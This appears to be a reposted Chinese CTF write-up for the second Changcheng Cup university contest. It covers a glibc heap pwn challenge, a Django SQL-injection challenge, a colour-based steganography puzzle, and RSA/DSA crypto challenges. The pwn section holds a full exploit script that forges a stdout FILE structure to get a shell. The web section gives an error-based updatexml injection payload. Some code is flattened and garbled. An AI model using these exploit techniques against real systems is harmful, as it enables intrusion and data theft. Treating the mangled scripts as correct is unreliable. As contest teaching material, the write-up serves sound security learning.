第二届长城杯网络安全大赛 高校组 WriteUp

admin 2022年8月24日23:05:57CTF专场评论121 views10242字阅读34分8秒阅读模式


解题思路

PWN

glibc_master

free的时候没有清零uaf漏洞,还可以无限制edit,只是edit的时候其实有一个加密所谓加密其实就是一个异或的过程只要再异或一次就能解密,add的时候限制大小。由于没有给libc我show了一次因为我本地是2.31-9.9的libc然后减了一下得到libcbase发现刚好是0x1000对齐,所以既然是2.31版本就有各种hook,但是free_hook和malloc_hook被ban了,但是用了puts函数关于io调用链所以用largebinattack攻击mp_结构体中的tcache大小就能将tcache扩大然后在IO_2_1_stdout伪造house of cat就能getshell

#encoding: utf-8#!/usr/bin/pythonfrom pwn import*import sys#context.log_level = "debug"context.arch="amd64"binary_name = "glibc_master"libc_name = "libc-2.31.so"ld_name = "ld"local = 1version = "9.7"elf =ELF("./"+binary_name)libc = ELF("/home/chen/glibc/{}/{}/{}".format(libc_name,version,libc_name))#ld = ELF("./"+ld_name)se      = lambda data               :io.send(data) sa      = lambda delim,data         :io.sendafter(delim, data)sl      = lambda data               :io.sendline(data)sla     = lambda delim,data         :io.sendlineafter(delim, data)rc      = lambda num                  :io.recv(num)rl      = lambda :io.recvline()ru      = lambda delims             :io.recvuntil(delims)uu32    = lambda data               :u32(data.ljust(4, b'x00')) uu64    = lambda data               :u64(data.ljust(8, b'x00'))info    = lambda tag, addr          :log.info(tag + " -------------> " + hex(addr))ia        = lambda :io.interactive()if local==1:    io = remote("123.56.77.227",18779)else:    io = process("./"+binary_name)

def debug(): gdb.attach(io,''' ''') pause()def add(index,size): sla(">>","1") sla("input index:",str(index)) sla("input size:",str(size))def edit(index,context): sla(">>","2") sla("input index:",str(index)) sla("input context:",context)def show(index): sla(">>","3") sla("input index:",str(index))def free(index): sla(">>","4") sla("input index:",str(index))def encrypt(data): s = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=' s1='' x = len(s) for i in range(len(data)): s1 += chr(ord(s[i%x]) ^ ord(data[i])) return s1





add(0,0x428)add(1,0x410)add(2,0x418)add(3,0x410)free(0)show(0)ru("n")libcbase = uu64(io.recv(6)) - 2018272system_addr=libcbase+libc.sym["system"]stdout_addr = libcbase + libc.sym["_IO_2_1_stdout_"]mp_addr =libcbase + 2015952 #2015952free_hook = libcbase + libc.sym["__free_hook"]

info("stdout_addr",stdout_addr)info("libcbase",libcbase)add(4,0x450)payload = p64(0)*3 + p64(mp_addr-0x20)edit(0,encrypt(payload))free(2)add(5,0x450)free(1)free(3)show(3)ru("n")heap_addr = uu64(io.recv(6))info("heap_addr",heap_addr)payload = p64(stdout_addr)edit(3,encrypt(payload))add(6,0x410)add(7,0x410)fake_IO_FILE = "/bin/shx00"+p64(0)*3fake_IO_FILE +=p64(0)fake_IO_FILE +=p64(0)fake_IO_FILE +=p64(1)+p64(0)fake_IO_FILE +=p64(heap_addr)#rdxfake_IO_FILE +=p64(system_addr)#call addrfake_IO_FILE +=p64(0xffffffffffffffff)fake_IO_FILE = fake_IO_FILE.ljust(0x48, 'x00')fake_IO_FILE += p64(0 ) # _chainfake_IO_FILE = fake_IO_FILE.ljust(0x88, 'x00')fake_IO_FILE += p64(libcbase+2025440) # _lock = writable addressfake_IO_FILE = fake_IO_FILE.ljust(0xa0, 'x00')fake_IO_FILE +=p64(stdout_addr+0x30) #rax1fake_IO_FILE = fake_IO_FILE.ljust(0xc0, 'x00')fake_IO_FILE += p64(0) # _mode = 0fake_IO_FILE = fake_IO_FILE.ljust(0xd8, 'x00')fake_IO_FILE += p64(libcbase+2002784+0x10) # vtable=IO_wfile_jumps+0x10fake_IO_FILE +=p64(0)*6fake_IO_FILE += p64(stdout_addr+48) # rax2edit(7,encrypt(fake_IO_FILE))#debug()ia()


WEB

djangogogo

开启了Debug,但是只有以year或者为month为开头的时候才会产生sql语句错误,从而找到对应的SQL语句

SELECT `Bill`.`id`, `Bill`.`good`, `Bill`.`purchase_date`,  `Bill`.`sale_datetime` FROM `Bill` WHERE EXTRACT(YEAR FROM `Bill`.`sale_datetime`) = (EXTRACT(YEAR OR 1 FROM `Bill`.`purchase_date`))

SELECT `Bill`.`id`, `Bill`.`good`, `Bill`.`purchase_date`, `Bill`.`sale_datetime` FROM `Bill` WHERE EXTRACT(MONTH FROM `Bill`.`sale_datetime`) = (EXTRACT(MONTH OR 1 FROM `Bill`.`purchase_date`))


这里用到了EXTRACT函数,并且在尝试过程中我们可以发现会默认将所有字符都直接大写,从而不能直接利用Bill数据库绕过,但是可以利用mysql自带的函数来获取时间,然后构造报错注入语句

payload:

?name=YEAR From now())) or updatexml(1,concat("~",(select flag from FLAG),"~"),1)%23

flag:

flag{2c7ac8d2-855e-4ee0-87cc-0f77a3a3b9dc}

MISC

办公室爱情

第二届“长城杯”网络安全大赛 高校组 WriteUp

搜索到密码,根据题目提示,流程应该是word->pdf->ppt

True_lOve_i2_supReMe

pdf的隐写就没几种,要么去掉图片,要么就是wbs43open

然后解出来得到密码

第二届“长城杯”网络安全大赛 高校组 WriteUp
第二届“长城杯”网络安全大赛 高校组 WriteUp

解压得到ppt

第二届“长城杯”网络安全大赛 高校组 WriteUp

简单看一下有8种图片

第二届“长城杯”网络安全大赛 高校组 WriteUp

分别为赤橙黄绿青蓝紫跟白

有绝大部分的黄色后面跟着白色,白色与白色之间的间隔大部分都是3,所以猜测白色是间隔

又因为有7种颜色(除去白色间隔),所以猜测可能为7进制

将颜色拿下来之后,写脚本,7进制转字符串转得到flag

x = '黄红青白黄橙绿白橙紫紫白黄红蓝白黄绿青白橙红红白紫紫白黄黄紫白黄红绿白橙紫青白黄红绿白黄绿橙白橙黄青白黄红绿白橙红红白橙紫青白青蓝白青蓝白青蓝白黄绿紫白'x = x.replace('红','0')x = x.replace('橙','1')x = x.replace('黄','2')x = x.replace('绿','3')x = x.replace('青','4')x = x.replace('蓝','5')x = x.replace('紫','6')x = x.replace('白','_')for i in x.split('_')[:-1]:   print(chr(int(i,7)),end='')#flag{10ve_exCe1_!!!}

CRYPTO

known_phi

在以前积累的CVE库中找到了现成的解已知phi分解n的脚本

后面就是dsa签名k的复用

第二届长城杯网络安全大赛 高校组 WriteUp

因为n分解出来的顺序可能不同,所以需要爆破m1和m2

from Crypto.Util.number import inverse, long_to_bytes, bytes_to_longfrom hashlib import sha256from math import gcd# from math import isqrtfrom random import randrangefrom sage.all import is_primedef factorize_multi_prime(N, phi): """ Recovers the prime factors from a modulus if Euler's totient is known. This method works for a modulus consisting of any number of primes, but is considerably be slower than factorize. More information: Hinek M. J., Low M. K., Teske E., "On Some Attacks on Multi-prime RSA" (Section 3) :param N: the modulus :param phi: Euler's totient, the order of the multiplicative group modulo N :return: a tuple containing the prime factors """    prime_factors = set()    factors = [N] while len(factors) > 0: # Element to factorize.        N = factors[0]

w = randrange(2, N - 1) i = 1 while phi % (2 ** i) == 0: sqrt_1 = pow(w, phi // (2 ** i), N) if sqrt_1 > 1 and sqrt_1 != N - 1: # We can remove the element to factorize now, because we have a factorization. factors = factors[1:]

p = gcd(N, sqrt_1 + 1) q = N // p

if is_prime(p): prime_factors.add(int(p)) elif p > 1: factors.append(int(p))

if is_prime(q): prime_factors.add(int(q)) elif q > 1: factors.append(int(q))

# Continue in the outer loop break

i += 1

return tuple(prime_factors)n = 104228256293611313959676852310116852553951496121352860038971098657350022997841589403091722735802150153734050783858816709247647536393314564077002364012463220999962114186339228164032217361145009468516448617173972835797623658266515762201804936729547278758839604969469770650218191574897316410254695420895895051693phi = 104228256293611313959676852310116852553951496121352860038971098657350022997837434645707418205268240995284026522165519145773852565112344453740579163420312890001524537570675468046604347184376661743552799809753709321949095844960227307733389258381950812717245522599433727311919405966404418872873961877021696812800n_factors = factorize_multi_prime(n, phi)q = 24513014442114004234202354110477737650785387286781126308169912007819s1 = 764450933738974696530033347966845551587903750431946039815672438603r1 = 8881880595434882344509893789458546908449907797285477983407324325035r2 = 8881880595434882344509893789458546908449907797285477983407324325035s2 = 22099482232399385060035569388467035727015978742301259782677969649659# n_factors = (92128261871628241975522014503893089775204276818952562864868068434189077323911, 112949642503320513342506215562619543574731838853984060837858943255064878544009, 87835491118288540715995802690214012778910595141140880257454164067662889225787, 114034877389817517986186253205403596431234414440955842208884285396147740113161)import itertoolsfor i in itertools.permutations([0,1,2,3]): m1 = long_to_bytes(n_factors[i[0]] + n_factors[i[1]]) m2 = long_to_bytes(n_factors[i[2]] + n_factors[i[3]]) hm1 = bytes_to_long(sha256(m1).digest()) hm2 = bytes_to_long(sha256(m2).digest()) k = inverse((s1-s2),q)*(hm1-hm2) % q x1 = (s1*k-hm1)*inverse(r1,q) % q x2 = (s2*k-hm2)*inverse(r2,q) % q if b'flag' in long_to_bytes(x1): print(long_to_bytes(x1))# b'flag{ea16de7-1981-11ed-b58f}'



rsa

第二届长城杯网络安全大赛 高校组 WriteUp

from gmpy2 import *from Crypto.Util.number import *n = 0x62c048bc886075bffb9ad01255786dd8ef2480ba510f13689c1e84ffaaf21dfb5695a4d83f4ba22093bdd75bfc8f5979185d29724ecccf045e1857b1b2a4757dd82dc44318c054c9fce9bc451e6beecb97bbda6562420fc8c295521c5455443413f90403cf1af6271fb6d2d54378b86ced18ae6844a877890ea853a215880a09c68c517a75c1183c067b706ce630f3f0913591f7354cfa60c8f6b7ab2f15e466a1ea6e8034417a5fc3c11b8ba746596c22c734b09257e9a6fb18358738d416eda0ba0e7b028dd2d550b1e018b180916ac25f47910657a5db2410946c0593b7e23ed1659a811083f363ad4eb65642091a040befbd643089bbee376634d2394d11e1 = 0x124241a12ea2be53f9b9b1fd92e10d089cfa32aa07e6c2cace848aaa6c73ff06d4c6c92b7d1f29160b2eef95a5f580915d3f15c0ea23975cbadfe8347a10daab2bd0827d7e909b329ec53c5eb306f0a5125b3817e7ea0c15b2317a46c36c4f34fc626dadc6c769bcc7be18ddf7954fae8dde3fd4ce3c5146c019bdb0d9552af1dc9ef7186e06b1d59e763fb05c7cd21fbb3f509fee52d4e24921ebfa76bb8302ea6760e92606e440907cc1c110946af53900904e84dbc309fcef15ea060c667070e5e0310891606df151609ff609bcc6125c6043c35119b25df78b4d5ca61ab6492753cc5e5b32e044fce0aeb0442464f36298add254e9fb6505fa4cddae1cf7e2 = 0x17b3937cec3ca5fdddad8db29c6dc4efae1408bf5b4aa2ff602112c50f302e9698c79c7ab79fef0210c621dcc218d91d358b7f93a978c4e3f2b982794697c4797cef89189d1464ed1c767bf72433092922352885f8e355952c558ad2c9ade58a19375ddc5dcf3f9fa28c68a5cff158734d94224b85f77bd939133f39ab7884ece61d9fb3496373008827c2ae694dfe7da08eee348ef99c3a6737a4b088b62978cf209ef3d1140a30d42872615b94378108266e3d344caf51b497a585a4b5ef8619cc46959bad9b89f59f36175fbf9b64363443f3f7743896c72a198decedf89c518fa07b1d401d0359578a4926b7d67de86232ee24751f17dafbc749c0783b33e3 = 0x5647c4490bda9e7e497651551600572c5ef4e2d889b9b1ba0e9a493660497e10877e975c01da9aebae5e3ba9aad976a1a783b39191e8fd799689dfa26b069264d60543602d514ac412ac75d827d67c78ad544bda633f0fa69fb5bbc37e0f6b95714576ff53bae3f7f991d143a4b1e841730d5d580d4effeb8fb02e8b3c3c9a1f1899d2eb411ce37f16d30cfa1f7af7322be4f42f5d012f484a1181fa4aa0b5f420a472030a5c08c80bff76ab82ef5768bfd495abcdc5f22aae1891561322dfb28ff63c4e467411c8b73c11d64b05f411e2a1de0c7754c6a62d1f72cded9e2592ccc21be3fce4ea6f083a617a246fd3fe464ef2487adbfabfb628c882ea991675c = 0x45f2ee650d622d1e0f0e2e2e861001e9866c541f9f1dd2ec1dec18194f8b7224914916ecd68bbc74b28a000d2664e671586aed63b54c0928a939caf28d39eeba03c0ce3afcf2cdc5805e8e2792d76e88545aa4dee11078ba1e2e5b56ee23d58e443d7aff180d4e7463ae66ea8e96e0c8d4e1443e7664b99599af14e591e28cf2f833bd30b44b89c396b5fc1ee81ea3f7bc08dab426b1871eb66829c81d57e2ebf5c7a3e9c593ce496f0b0c4237906b019ae75ca551d6b0b1adfe64958c2ead6c39e517eb75eaf4b4d72402bea40f043cf0a80317aa2f1a996c727e195e15f903c0cac618f668af1015ee479d1c7b1c1b370fd4a5a76f5bf295e6bd7d0f4ae56fl0 = 0x3dbabf6ea5b801221c283bd234f04264d292c8f3048c8b59c21e003cda983a3a41e4392c6ea77a706631de60d261f2b367027e037d37fda5a13a8e01b2c6c0f48a3112315cffe7420a50a3ebada09aba61f8e6da793654a467b9f780c20c5085012e064ab9205c076073b4fb4895e01d0d568fd5c30159879180093855d39d5548a1389a94f57c680ckphi = e1 - e2 + l0 * e1 * e2d3 = inverse(e3,kphi)d1 = inverse(e1,kphi)d2 = inverse(e2,kphi)assert d1 - d2 == l0print(long_to_bytes(pow(c,d3,n)))# b'flag{-oh!!h0w_c4N_Y0u_sOlVe_th15_d_bouNd_of_RSA???_}'


往期推荐

2022巅峰极客网络安全技能挑战赛 WriteUp

团建分享 | 与你,“安”于心

第六届”蓝帽杯“全国大学生网络安全技能大赛半决赛 WriteUp

知识分享 | “区块链”知多少?

知识分享 | 解出一道Musl pwn要几步?

SAVE ELECTRICITY
第二届长城杯网络安全大赛 高校组 WriteUp
扫码关注我们
文案 | v100eatKFC、TeamGipsy
第二届长城杯网络安全大赛 高校组 WriteUp

原文始发于微信公众号(杭师大网安):第二届“长城杯”网络安全大赛 高校组 WriteUp

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年8月24日23:05:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  第二届长城杯网络安全大赛 高校组 WriteUp http://cn-sec.com/archives/1251145.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: